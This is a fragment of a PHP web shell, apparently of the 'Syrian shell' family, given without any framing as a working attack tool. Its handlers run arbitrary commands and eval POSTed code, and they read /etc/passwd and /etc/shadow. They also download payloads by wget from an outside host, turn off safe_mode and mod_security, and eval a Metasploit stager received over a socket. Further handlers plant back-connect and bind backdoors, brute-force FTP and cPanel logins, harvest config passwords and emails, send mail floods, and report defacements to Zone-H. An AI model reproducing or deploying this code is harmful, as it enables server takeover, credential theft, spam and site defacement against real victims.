{
echo Exe($_POST['cmd']);
}
}
else if($_POST['submitEval']) // Execute Eval Code .
{
$eval = @str_replace("<?php","",$_POST['php_eval']);
$eval = @str_replace("<?php","",$eval);
$eval = @str_replace("?>","",$eval);
$eval = @str_replace("\\","",$eval);
echo eval($eval);
}
# -------------------------# Hash Analyzer
#--------------------------else if($_POST['analyzieNow'])
{
$hash = $_POST['hashToAnalyze'];
$subHash = substr($hash,0,3);
if($subHash =='$ap' && strlen($hash) == 37)
{
echo "The Hash : ".$hash." is : MD5(APR) Hash";
}
else if($subHash =='$1$' && strlen($hash) == 34)

{
echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
}
else if($subHash =='$H$' && strlen($hash) == 35)
{
echo "The Hash : ".$hash." is : MD5(phpBB3) Hash
";
}
else if(strlen($hash) == 29)
{
echo "The Hash : ".$hash." is : MD5(Wordpress) H
ash";
}
else if($subHash =='$5$' && strlen($hash) == 64)
{
echo "The Hash : ".$hash." is : SHA256(UNIX) Has
h";
}
else if($subHash =='$6$' && strlen($hash) == 128)
{
echo "The Hash : ".$hash." is : SHA512(UNIX) Has
h";
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :

56)
".$hash." is : SHA224 Hash";
64)
".$hash." is : SHA256 Hash";
96)
".$hash." is : SHA384 Hash";
128)
".$hash." is : SHA512 Hash";
40)
".$hash." is : MySQL v5.x Hash"

;
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
}
else if(strlen($hash) ==
{
echo "The Hash :
-CCITT]-[FCS-16]";}

16)
".$hash." is : MySQL Hash";
13)
".$hash." is : DES(Unix) Hash";
32)
".$hash." is : MD5 Hash";
4)
".$hash." is : [CRC-16]-[CRC-16

else
{
echo "Error : Can't Detect Hash Type";
}
}
# -------------------------# Show Users
#--------------------------else if($_POST['showUsers'])
{
function showUsers()
{
if($rows = Exe('cat /etc/passwd'))
{
echo $rows;
}
elseif($rows= Exe('cat /etc/domainalias'))
{
echo $rows;
}
elseif($rows= Exe('cat /etc/shadow'))
{
echo $rows;
}
elseif($rows= Exe('cat /var/mail'))
{
echo $rows;
}
elseif($rows= Exe('cat /etc/valiases'))
{
echo $rows;
}
else { echo "[-] Can't Show Users :( ... Sorry "
;}
}
showUsers();
}
# -------------------------# Generate perl
#--------------------------else if($_POST['generatePel'])
{
@chdir($_POST["cgiperlPath"]);
@mkdir("cgi", 0755);
@chdir("cgi");
Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy
3.zip');
Exe('unzip cgiPerl.sy3.zip');
@unlink('cgiPerl.sy3.zip');
@chmod("cgiPerl.sy3",0755);
@chmod("compiler",0777);
$cgi_h = fopen('.htaccess','w+');
@fwrite($cgi_h,'AddHandler cgi-script .sy3');
echo '
cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
Password Is : sy34' ;
}
# -------------------------# Generate Server

#--------------------------else if($_POST['generateSER'])
{
@chdir($_POST['ShourtCutPath']);
@mkdir("allserver", 0755);
@chdir("allserver");
Exe("ln -s / allserver");
GenerateFile(".htaccess","
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php");
echo 'Now Go to allserver folder '.$_POST['ShourtCutPath
'].'' ;
}
# -------------------------# Change Mode
#--------------------------else if($_POST['changePermission'])
{
$ch_ok = @chmod($_POST['fileName'],$_POST['per']);
if($ch_ok)
echo "Permission Changed Successfully ! " ;
else echo "Changing Is Not Allowed Or The File is not Ex
ist !";
}
# -------------------------# Generate Users
#--------------------------else if($_POST['GenerateUsers'])
{
@chdir($_POST['usersPath']);
@mkdir("users", 0755);
@chdir('users');
Exe('wget http://www.syrian-shell.com/usersAndDomains/us
ers.rar');
Exe('mv users.rar users.sy3');
@chmod('users.sy3',0755 );
$user_h = fopen('.htaccess','w+');
fwrite($user_h,'AddHandler cgi-script .sy3');
echo "users.sy3 & .htaccess Has Been Created in [ users
] Directory" ;
}
# -------------------------# Forbidden
#--------------------------else if($_POST['generateForbidden'])
{
@chdir($_POST['forbiddenPath']);
@mkdir('forbidden');
@chdir('forbidden');
$htaccess = fopen('.htaccess','w+');
if($_POST['403'] == 'DirectoryIndex')
{
fwrite($htaccess,"DirectoryIndex in.txt");
}
elseif($_POST['403'] == 'HeaderName')
{
fwrite($htaccess,"HeaderName in.txt");
}

elseif($_POST['403'] == 'TXT')
{
fwrite($htaccess,"
Options Indexes FollowSymLinks
addType txt .php
AddHandler txt .php");
}
elseif($_POST['403'] == '404')
{
fwrite($htaccess,"
ErrorDocument 404 /404.html
404.html = Symlinked in.txt ");
}
elseif($_POST['403'] == 'ReadmeName')
{
fwrite($htaccess,"ReadmeName in.txt");
}
elseif($_POST['403'] == 'footerName')
{
fwrite($htaccess,"footerName in.txt");
}
echo "
Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
EX : ln -s /home/user/public_html/config.php in.txt";
}
# -------------------------# Upload Files
#--------------------------else if($_POST['UploadNow'])
{
$nbr_uploaded =0;
$files_uploded = array();
$path= '';
$target_path= $path . basename($_FILES['uploadfile']['na
me'][$i]);
for ($i = 0; $i < count($_FILES['uploadfile']['name']);
$i++)
{
if($_FILES['uploadfile']['name'][$i] != '')
{
move_uploaded_file($_FILES['uploadfile']
['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
$files_uploded[] = $_FILES['uploadfile']
['name'][$i];
$nbr_uploaded++;
echo "The File ".basename($_FILES['uplo
adfile']['name'][$i])." Uploaded Successfully !
";
}
else "The File ".basename($_FILES['uploadfile']
['name'][$i])." Can't Be Upload :( !";
}
}
# -------------------------# no Security
#--------------------------else if($_POST['phpiniGenerate'])
{
GenerateFile("php.ini","
safe_mode = Off

disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF");
echo "php.ini Has Been Generated Successfully";
}
else if($_POST['htaccessGenerate'])
{
GenerateFile(".htaccess","
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC ".getcwd()."php.ini
suPHP_ConfigPath ".getcwd()."php.ini
");
echo ".htaccess Has Been Generated Successfully ";
}
else if($_POST['iniphpGenerate'])
{
GenerateFile("ini.php","
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
");
echo "ini.php Has Been Generated Successfully";
}
# -------------------------# Reading Files
#--------------------------else if($_POST['read'] || $_POST['show'])
{
$file = $_POST['file'];
$file = str_replace('\\\\','\\',$file);
if($_POST['read'])
{
$openMyFile = fopen($file,'r');
if(function_exists('fread'))
{
echo fread($openMyFile,100000);
}
elseif(function_exists('fgets'))
{
echo fgets($openMyFile);
}
elseif(function_exists('readfile'))
{
echo readfile($openMyFile);
}
elseif(function_exists('file_get_content
s'))
{
$readMyFile = @file_get_contents
($file, NULL, NULL, 0, 1000000);
var_dump($readMyFile);
}
elseif(function_exists('file'))

{
$readMyFile = file($myFile);
foreach ($readMyFile as $line_nu
m => $readMyFileLine)
{
echo "Line #$line_num :
" . $readMyFileLine . "
";
}
}
elseif(Exe("'cat ".$file."'"))
{
echo Exe("'cat ".$file."'");
}
elseif(function_exists('readfile'))
{
readfile($file);
}
elseif(function_exists('include'))
{
include($file);
}
elseif(function_exists('copy'))
{
$tmp=tempnam('','cx');
copy('compress.zlib://'.$file,$tmp);
$fh=fopen($tmp,'r');
$data=fread($fh,filesize($tmp));
fclose($fh);
echo $data;
}
elseif(function_exists('mb_send_mail'))
{
if(file_exists('/tmp/mb_send_mail'))
{
unlink('/tmp/mb_send_mail');
}
@mb_send_mail(NULL, NULL, NULL, NULL,'-C
$file -X /tmp/mb_send_mail');
@readfile('/tmp/mb_send_mail');
}
else if(function_exists('curl_init'))
{
$fh=curl_init('file://'.$file.'');
$tmp=curl_exec($fh);
echo $tmp;
if(strstr($file,DIRECTORY_SEPARATOR))
$ch=curl_init('file:///'.$file."\x00/../
../../../../../../../../../../../".__FILE__);
else $ch=curl_init('file://'.$file."\x00
".__FILE__);
var_dump(curl_exec($ch));
}
else if(is_writable('.'))
{
file_put_contents('php.ini','safe_mode =
Off');
readfile($file);
unlink('php.ini');
}

else if(is_object($ws=new COM('WScript.Shell')))


{
echo $exec=comshelL("type \"$file\"",$ws
);
}
else if(checkfunctioN('win_shell_execute'))
{
echo winshelL("type \"$file\"");
}
else if(checkfunctioN('win32_create_service'))
{
echo srvshelL("type \"$file\"");
}
else if(function_exists('imap_open'))
{
$str=imap_open('/etc/passwd','','');
$list=imap_list($str,$file,'*');
for($i=0;$i<count($list);$i++)
{
echo $list[$i]."\n";
}
imap_close($str);
$str=imap_open($file,'','');
$tmp=imap_body($str,1);
echo $tmp;
imap_close($str);
}
elseif($file == '/etc/passwd')
{
for($uid=0;$uid<99999;$uid++)
{
$h=posix_getpwuid($uid);
if(!empty($h))
foreach($h as $v)
echo "$v:";
echo "\r\n";
}
}
fclose($openMyFile);
}
elseif($_POST['show'])
{
$con=glob("$file*");
foreach ($con as $v)
{
echo "$v\n";
}
if(function_exists('imap_open'))
{
$str=imap_open('/etc/passwd','','');
$s=explode("|",$file);
if(count($s)>1)
{
$list=imap_list($str,trim($s[0])
,trim($s[1]));
}
else
{
$list=imap_list($str,trim($str[0
]),'*');

}
for($i=0;$i<count($list);$i++)
{
imap_close($str);
}
}
else if(is_object($ws=new COM('WScript.Shell')))
{
$exec=comshelL("dir \"$file\"",$ws);
$exec=str_replace("\t",'',$exec);
echo $exec;
}
else if(checkfunctioN('win_shell_execute'))
{
echo winshelL("dir \"$file\"");
}
else if(checkfunctioN('win32_create_service'))
{
echo srvshelL("dir \"$file\"");
}
}

MD5
Base64 Encode
Base64 Decode
Crypt
SHA1
MD4
SHA256
URL Encoding
URL Decoding
CRC32
Length

}
# -------------------------# Encryption
#--------------------------elseif($_POST['encryptNow'])
{
if(!empty($_POST['ENCRYPTION']))
{
$md5 = $_POST['ENCRYPTION'];
echo "
: ".md5($md5)."
: ".base64_encode($md5)."
: ".base64_decode($md5)."
: ".crypt($md5)."
: ".sha1($md5)."
: ".hash("md4",$md5)."
: ".hash("sha256",$md5)."
: ".urlencode($md5)."
: ".str_hex($md5)."
: ".crc32($md5)."
: ".strlen($md5)."";
}
else
{
echo "Please Put At Least One Char !";
}
}
# -------------------------# Metasploit RC
#--------------------------else if($_POST['metaConnect'])
{
$ip = $_POST['ip'];
$port = $_POST['port'];
if ($ip == "" && $port == "")
{
echo "Please fill IP Adress & The listen Port";
}

else
{
$ipaddr = $ip;
$port = $port;
if (FALSE !== strpos($ipaddr, ":"))
{
$ipaddr = "[". $ipaddr ."]";
}
if (is_callable('stream_socket_client'))
{
$msgsock = @stream_socket_client("tcp://
{$ipaddr}:{$port}");
if (!$msgsock)
{
die();
}
$msgsock_type = 'stream';
}
elseif (is_callable('fsockopen'))
{
$msgsock = fsockopen($ipaddr,$port);
if (!$msgsock)
{
die();
}
$msgsock_type = 'stream';
}
elseif (is_callable('socket_create'))
{
$msgsock = socket_create(AF_INET, SOCK_S
TREAM, SOL_TCP);
$res = socket_connect($msgsock, $ipaddr,
$port);
if (!$res)
{
die();
}
$msgsock_type = 'socket';
}
else
{
die();
}
switch ($msgsock_type)
{
case 'stream': $len = fread($msgsock, 4)
; break;
case 'socket': $len = socket_read($msgso
ck, 4); break;
}
if (!$len)
{
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$buffer = '';
while (strlen($buffer) < $len)
{
switch ($msgsock_type)

{
case 'stream': $buffer .= fread(
$msgsock, $len-strlen($buffer));
break;
case 'socket': $buffer .= socket
_read($msgsock, $len-strlen($buffer));
break;
}
}
eval($buffer);
echo "[*] Connection Terminated";
die();
}
}
# -------------------------# Scan Ports
#--------------------------else if($_POST['submitDomainToScanPort'])
{
$domainToScan = $_POST['domainToScanPort'];
if(!$domainToScan)
{
echo "[-] Enter IP Address Or Domain To Scan";
}
else
{
for($i=0;$i<1024;$i++)
{
$fp = @fsockopen($domainToScan,$i,$errno
,$errstr,10);
if($fp)
{
echo "[+] port " . $i . " open o
n " . $domainToScan . "
";
}
else
{
echo "[+] port " . $i . " closed
on " . $domainToScan . "
";
}
flush();
}
fclose($fp);
}
}
if (isset($_POST["submit_lol"]))
{
set_time_limit(0);
$url = $_POST['hash_lol'];
echo "Testing ".$url."\n";
$extention = $_POST['extention'];
$adminlocales = array(
"admin/",
"wp-admin/",
"administration/",
"administrator/",
"moderator/",

"webadmin/",
"adminarea/",
"bb-admin/",
"adminLogin/",
"admin_area/",
"panel-administracion/",
"instadmin/",
"memberadmin/",
"administratorlogin/",
"adm/",
"siteadmin/login".$extention."",
"admin/account".$extention."",
"admin/index".$extention."",
"admin/login".$extention."",
"admin/admin".$extention."",
"admin_area/login".$extention."",
"admin_area/index".$extention."",
"admincp/index".$extention."",
"adminpanel".$extention."",
"webadmin".$extention."",
"webadmin/index".$extention."",
"webadmin/login".$extention."",
"admin/admin_login".$extention."",
"admin_login".$extention."",
"panel-administracion/login".$extention."",
"admin_area/admin".$extention."",
"bb-admin/index".$extention."",
"bb-admin/login".$extention."",
"bb-admin/admin".$extention."",
"admin/home".$extention."",
"pages/admin/admin-login".$extention."",
"admin/admin-login".$extention."",
"admin-login".$extention."",
"admin/adminLogin".$extention."",
"home".$extention."",
"adminarea/index".$extention."",
"admin/controlpanel".$extention."",
"admin".$extention."",
"admin/cp".$extention."",
"cp".$extention."",
"adminpanel.php",
"moderator".$extention."",
"administrator/index".$extention."",
"administrator/login".$extention."",
"user".$extention."",
"administrator/account".$extention."",
"administrator".$extention."",
"login".$extention."",
"modelsearch/login".$extention."",
"moderator/login".$extention."",
"panel-administracion/admin".$extention."",
"admincontrol/login".$extention."",
"adm/index".$extention."",
"moderator/admin".$extention."",
"account".$extention."",
"controlpanel".$extention."",
"admincontrol".$extention."",
"webadmin/admin".$extention."",
"adminLogin".$extention."",
"panel-administracion/login".$extention."",

"wp-login".$extention."",
"adminLogin".$extention."",
"admin/adminLogin".$extention."",
"adminarea/index".$extention."",
"adminarea/admin".$extention."",
"adminarea/login".$extention."",
"panel-administracion/index".$extention."",
"modelsearch/index".$extention."",
"modelsearch/admin".$extention."",
"adm/admloginuser".$extention."",
"admloginuser".$extention."",
"admin2".$extention."",
"admin2/login".$extention."",
"admin2/index".$extention."",
"adm/index".$extention."",
"adm".$extention."",
"affiliate".$extention."",
"adm_auth".$extention."",
"memberadmin".$extention."",
"administratorlogin".$extention."");
foreach ($adminlocales as $admin)
{
$headers = @get_headers("$url$admin");
if (@eregi('200', $headers[0]))
{
echo "[+] $url$admin ~ Found!\n
";
}
}
}
# -------------------------# Config Finder
#--------------------------else if($_POST['configFinderSubmit'])
{
set_time_limit(0);
$passwd=fopen('/etc/passwd','r');
if (!$passwd)
{
echo "[-] Error : coudn't read /etc/passwd";
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd))
{
$str=fgets($passwd);
if ($i>35)
{
$pos=strpos($str,":");
$username=substr($str,0,$pos);
$dirz="/home/$username/public_html/";
if (($username!=""))
{
if (is_readable($dirz))
{
array_push($users,$username);

array_push($path_to_public,$d
irz);
}
}
}
$i++;
}
echo "";
echo "[+] Founded ".sizeof($users)." entrys in /etc/pass
wd
";
echo "[+] Founded ".sizeof($path_to_public)." readable p
ublic_html directories
";
echo "[~] Searching for passwords in config.* files...
";
foreach ($users as $user)
{
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "[+] Done";
}
# -------------------------# Mail Storm
#--------------------------else if($_POST['sendMailStorm'])
{
$to=$_POST['to'];
$nom=$_POST['nom'];
$Comments=$_POST['Comments'];
if ($to <> "" )
{
for ($i = 0; $i < $nom ; $i++)
{
$from = rand (71,1020000000)."@"."Attack
er.com";
$subject= md5("$from");
if(@mail($to,$subject,$Comments,"From:$f
rom"))
echo "[+] $i spammed !!
";
else
{
echo "[-] $i Failed !!
";
}
}
}
}
# -------------------------# Extract Emails
#--------------------------else if($_POST['getEmails'])
{
$emhost = $_POST['EM_HOST'];
$emuser = $_POST['EM_USER'];
$empass = $_POST['EM_PASS'];
$emdb = $_POST['EM_DB'];

$emtab = $_POST['EM_TABLE'];
$emcol = $_POST['EM_COLUMN'];
$try2Connect = @mysql_connect($emhost,$emuser,$empass);
if(!$try2Connect)
{
echo "[-] Can't Connect To DB !! [ user name ||
password is wrong ! ] .
";
}
$try2Select = @mysql_select_db($emdb);
if(!$try2Select && $try2Connect)
{
echo "[-] DB Name is Wrong !! . ";
}
$sql = @mysql_query("SELECT * FROM $emtab");
while ($res = @mysql_fetch_array($sql))
{
echo ''.$res["$emcol"].'
';
}
}
// Help
else if($_POST['emailExtractorHelp'])
{
echo "This is Some Tables Name & Columns Name For Some F
am Scripts ..
[+] VBulletin
Table-name : user
column-name : email
[+] WordPress
Table-name : wp_users
column-name : user_email
[+] Joomla
Table-name : jos_users
column-name : email
[+] PHPBB
Table-name : phpbb_users
column-name : user_email
[+] I.P.Board
Table-name : ibf_members
column-name : email
[+] SMF
Table-name : smf_members
column-name : emailAddress ";
}
# -------------------------# MySQL Query
#--------------------------else if($_POST['MySQLQuery'])
{
$qu_host =$_POST['QU_HOST'];
$qu_user =$_POST['QU_USER'];
$qu_pass =$_POST['QU_PASS'];
$qu_db =$_POST['QU_DB'];

$query =$_POST['QU'];
if (empty($_POST['QU_HOST']))
$qu_host = 'localhost';
$query = str_replace("\\","",$query);
if (!empty($_POST['QU']))
{
$tryConnection = @mysql_connect($qu_host,$qu_use
r,$qu_pass);
if(!$tryConnection)
{
echo "[-] Unable TO Connect DATABASE ! U
sername Or Password Is Wrong !!";
}
else
{
$selectDB = @mysql_select_db($qu_db);
if(!$selectDB)
{
echo "[-] Database Name Is Wrong
!!";
}
else
{
$qqok1 = mysql_query($query);
if(!$qqok1)
{
echo "[-] Can't Execute
The Query";
}
}
}
@mysql_close();
}
if ($qqok1)
{
update();
}
}
# -------------------------# SQL Reader
#--------------------------else if ($_POST['sql2Read'])
{
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$unique = uniqid('N');
$file = $_POST['file'];
$file = str_replace('\\\\','\\',$file);
$query = array(
"CREATE TEMPORARY TABLE $unique (file LONGBLOB)"
,
"LOAD DATA INFILE '".mysql_real_escape_string($f
ile)."' INTO TABLE $unique",
"SELECT * FROM $unique"
);
$connect = mysql_connect($host,$user, $pass);
mysql_select_db($db,$connect);
foreach($query as $Allqueries)

{
$mysqlQuery = mysql_query($Allqueries,$c
onnect);
while($line = @mysql_fetch_row($mysqlQue
ry))
echo htmlspecialchars($line[0]);
echo "\n";
}
}
# -------------------------# Edit File
#--------------------------else if($_POST['editFileSubmit'])
{
$file2Edit = $_POST['editFile'];
echo @file_get_contents($file2Edit);
}
else if($_POST['saveEditedFile'])
{
$fileName = $_POST['file2edit'];
$newFile = $_POST['ExecutionArea'];
$trytoGenerate = GenerateFile($fileName,$newFile
);
if($trytoGenerate)
{
echo "[+] File Saved !";
}
else
{
echo "[-] Failed To Save File !!";
}
}
# -------------------------# Zone H Attacker
#--------------------------else if($_POST['SendNowToZoneH'])
{
ob_start();
$sub = @get_loaded_extensions();
if(!in_array("curl", $sub))
{
die('[-] Curl Is Not Supported !! ');
}
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
if (empty($hacker))
{
die ("[-] You Must Fill the Attacker nam
e !");
}
elseif($method == "--------SELECT--------")
{
die("[-] You Must Select The Method !");
}
elseif($neden == "--------SELECT--------")
{

die("[-] You Must Select The Reason");


}
elseif(empty($site))
{
die("[-] You Must Inter the Sites List !
");
}
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http")
{
$sites[$i] = "http://".$sites[$i
];
}
ZoneH("http://zone-h.org/notify/single",
$hacker, $method, $neden, $sites[$i]);
echo "Site : ".$sites[$i]." Defaced !\n"
;
++$i;
}
echo "[+] Sending Sites To Zone-H Has Been Compl
eted Successfully !! ";
}
# -------------------------# FTP And Cpanle Brute Force Attacker
#--------------------------else if($_POST['BruteForceCpanelAndFTP'])
{
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['BruteForceCpanelAndFTP'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if(empty($target))
{
$target = "localhost";
}
function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$ho
st");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLA
UTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1)
;
curl_setopt($ch, CURLOPT_USERPWD, "$user
:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT
, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1)
;

$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "Error : Connection Timeo
ut Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "[+] Cracking Success With
Username ($user) and Password ($pass)";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout
)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$h
ost:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLA
UTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user
:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT
, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1)
;
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "[-] Connection Timeout Pl
ease Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "[+] Cracking Success With
Username ($user) and Password ($pass)";
}
curl_close($ch);
}
if(isset($submit) && !empty($submit))
{
if(empty($users) && empty($pass))
{
print "[-] Please Check The User
s or Password List Entry . . .";
}
if(empty($users))
{
print "[-] Please Check The User
s List Entry . . .";
}
if(empty($pass))
{
print "[-] Please Check The Pass
word List Entry . . ";

}
$userlist=explode("\n",$users);
$passlist=explode("\n",$pass);
print "[~]# Cracking Process Started, Pl
ease Wait ...";
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password
)
{
$purepass = trim($passwo
rd);
if($cracktype == "ftp")
{
ftp_check($targe
t,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpane
l")
{
cpanel_check($ta
rget,$pureuser,$purepass,$connect_timeout);
}
}
}
}
}
# -------------------------# Back Connection
#--------------------------else if($_POST['backconn'])
{
if (!empty($_POST['backport']) && !empty($_POST[
'ip']) && ($_POST['use'] == 'C'))
{
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcc.c",$back_connect_c);
Exe('gcc -o bcc bcc.c');
Exe('chmod 777 bcc');
@unlink('bcc.c');
Exe("./bcc ".$ip." ".$port." &");
$msg = "Now script try connect to ".$ip.
" port ".$port." ...";
}
elseif (!empty($_POST['backport']) && !empty($_P
OST['ip']) && ($_POST['use'] == 'Perl'))
{
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcp",$back_connect);
Exe("chmod +x bcp");
$p2=which("perl");
Exe($p2." bcp ".$ip." ".$port." &");
$msg = "Now script try connect to ".$ip.
" port ".$port." ...";
}
}
# --------------------------

# Bind Connection
#--------------------------else if($_POST['bind'])
{
if (!empty($_POST['port']) && !empty($_POST['bin
d_pass']) && ($_POST['use'] == 'C'))
{
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdc.c",$port_bind_bd_c);
Exe('gcc -o bdc bdc.c');
Exe('chmod 777 bdc');
@unlink("bdc.c");
Exe("./bdc ".$port." ".$passwrd." &");
$scan = Exe("ps aux");
if(eregi("./bdc $por",$scan))
{
$msg = "Process found running, b
ackdoor setup successfully.";
}
else
{
$msg = "Process not found runnin
g, backdoor not setup successfully.";
}
}
elseif (!empty($_POST['port']) && !empty($_POST[
'bind_pass']) && ($_POST['use'] == 'Perl'))
{
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdp",$port_bind_bd_pl);
Exe("chmod 777 bdp");
$p2=which("perl");
Exe($p2." bdp ".$port." &");
$scan = Exe("ps aux");
if(eregi("$p2 bdp $port",$scan))
{
$msg = "Process found running, b
ackdoor setup successfully.";
}
else
{
$msg = "Process not found runnin
g, backdoor not setup successfully.";
}
}
}
echo "</textarea>";
if($_POST['editFileSubmit'])
{
echo "<input type='hidden' value='".$_POST['editFile']."' name='
file2edit' /> ";
echo "<input type='submit' value='Save' name='saveEditedFile'>";
}
echo "</form>

<!-- Main Table -->


<table width='100%'><tr>
<td width='30%' height=30>
<!-- End Of Main Table -->
<!-- Commands Alias-->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Commands Alias </td></t
r><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></f
orm>
<!-- End Of Commands Alias-->
</td>
<td width='30%' height=30>
<!-- Command Line -->
<form method='POST'>
<table width='100%' height='72' border='0' id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Command Line </td></tr>
<tr><td height='45' colspan='2'>
<input type='text' name='cmd' id='commandLine' value='dir' size=59>
<input type='text' name='directory' value=".getcwd()." size=59>
<input name='Execute' id='Execute' type='submit' value='Execute' >
</td></tr></table></form>
<!-- End Of Command Line -->
</td>
<td width='30%' height=30>
<!-- Edit File -->
<form method=POST>
<table width='100%' height='72' border='0' id='Box'><tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr
><td height='45' colspan='2'>
<input type='text' name='editFile' size=59>
<input name='editFileSubmit' type='submit' value='Edit'>
</td></tr></table></form>
<!-- End Of Edit File -->
</td>
</tr>
<tr>
<td width='30%'>
<!-- Chmod Force -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><
tr><td height='45' colspan='2'>
<input type='text' name='fileName' value='index.php' size=48>
<br/><input type='text' name='per' value='0644' size='10'>
<input type=submit value='Change Now !' name='changePermission'>
</td></tr></table></form>
<!-- End Of Chmod Force -->
</td>
<td>

<!-- Get File -->


<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr>
<td height='45' colspan='2'>
<input type='text' name='fileUrl' size='59' value='http://www.'>
<select name=getType>
<option value=wget>wget</option>
<option value='curl -o'>curl -o</option>
<option value=get>get</option>
<option value='lynx -source'>lynx -source</option>
</select>
<input name=getFile type=submit value='Get File' >
</td></tr></table></form>
<!-- End Of Get File -->
</td>
<td>
<!-- Bind Connection -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Bind Connection </td></
tr><tr><td height='45' colspan='2'>
<input class='inputz' type='text' name='bind_pass' size='26' value='".ge
thostbyname($_SERVER["HTTP_HOST"])."'>
<input type='text' name='port' size='26' value='443'>
<select class='inputz' size='1' name='use'>
<option value='Perl'>Perl</option><option value='C'>C</option>
</select>
<input class='inputzbut' type='submit' name='bind' value='Bind' style='w
idth:120px'>
</td></tr></table></form>
<!-- End Of Bind Connection -->
</td>
</tr>
<tr>
<td>
<!-- CGI perl -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr>
<td height='45' colspan='2'>
<input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
<input type='submit' name='generatePel' value='Generate'></td></tr></tab
le></form>
<!-- End Of CGI perl -->
</td><td>
<!-- Forbidden -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr
><td height='45' colspan='2'>
<input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/

>
<select name='403'>
<option value='DirectoryIndex'>DirectoryIndex</option>
<option value='HeaderName'>HeaderName</option>
<option value='TXT'>TXT</option>
<option value='404'>404</option>
<option value='ReadmeName'>ReadmeName</option>
<option value='footerName'>footerName</option>
</select>
<input type='submit' value='Generate' name='generateForbidden'>
</td></tr></table></form>
<!-- End Of Forbidden -->
</td>
<td>
<!-- Back Connection -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><
tr>
<td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</
td>
<td style='background-color:#666;padding-left:10px;'>Back Connection </td></
